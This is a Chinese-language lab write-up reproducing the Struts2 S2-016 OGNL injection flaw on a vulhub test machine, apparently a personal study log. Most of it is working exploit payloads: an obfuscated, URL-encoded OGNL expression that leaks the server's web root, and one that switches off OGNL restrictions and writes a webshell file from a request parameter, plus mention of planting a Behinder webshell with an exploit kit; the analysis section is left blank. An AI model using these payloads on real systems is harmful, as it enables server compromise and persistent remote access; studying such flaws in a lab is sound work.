0X00-引言
每年桃花開的時候,我就會想起一個人
s2-016有點意思,看懂源碼后會補充
0X01-環境搭建
靶機:CentOS Linux 7
攻擊機:windows server 2016 && Kail
環境:vulhub
項目地址:https://github.com/vulhub/vulhub
搭建vulhub請訪問:空白centos7 64 搭建vulhub(詳細)
0X02-漏洞描述
在struts2中,DefaultActionMapper類以“action:”、“redirect:”、“redirectAction:”作為導航原生可以引導,但是這些自帶的同時跟OGNL表達式,由於struts2沒有對這些前綴做過濾,導致利用OGNL表達式調用java動態方法執行任意系統命令。
所以,訪問http://your-ip:8080/index.action?redirect:OGNL表達式瀏覽OGNL表達式。
0X03-漏洞復現
01-獲取web目錄
payload:
redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#ot=#resp.getWriter (),#ot.print('web'),#ot.print('path:'),#ot.print(#req.getSession().getServletContext().getRealPath('/')),#ot.flush(),#ot.close()}
url編碼:
%72%65%64%69%72%65%63%74%3a%24%7b%23%72%65%71%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%71%27%2b%27%75%65%73%74%27%29%2c%23%72%65%73%70%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%73%27%2b%27%70%6f%6e%73%65%27%29%2c%23%72%65%73%70%2e%73%65%74%43%68%61%72%61%63%74%65%72%45%6e%63%6f%64%69%6e%67%28%27%55%54%46%2d%38%27%29%2c%23%6f%74%3d%23%72%65%73%70%2e%67%65%74%57%72%69%74%65%72%20%28%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%77%65%62%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%70%61%74%68%3a%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%23%72%65%71%2e%67%65%74%53%65%73%73%69%6f%6e%28%29%2e%67%65%74%53%65%72%76%6c%65%74%43%6f%6e%74%65%78%74%28%29%2e%67%65%74%52%65%61%6c%50%61%74%68%28%27%2f%27%29%29%2c%23%6f%74%2e%66%6c%75%73%68%28%29%2c%23%6f%74%2e%63%6c%6f%73%65%28%29%7d
02-寫入webshell
木馬文件上傳不上去,可以生成文件,但是文件里面沒有內容,找不到原因,可能被殺掉了,但是靶場沒有防護軟件,聽朋友說有域控防控,后面在研究
payload:
redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath("/")).append(@java.io.File@separator).append("2.jspx").toString()),#b.write(#a.getParameter("t").getBytes()),#b.close(),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println("BINGO"),#genxor.flush(),#genxor.close()}
0X04-漏洞分析
略
0X05-日志查看
docker ps #查看容器ID
docker exec -it ID /bin/bash #進入
cd logs #進入日志目錄
cat localhost_access_log.2021-12-02.txt #查看日志
exit #退出容器
0X06-工具檢測
工具地址:https://github.com/Liqunkit/LiqunKit_
上傳冰蠍馬,工具可以上傳馬,但是手動上傳不上去馬的內容,不知道原因
路徑
冰蠍連接
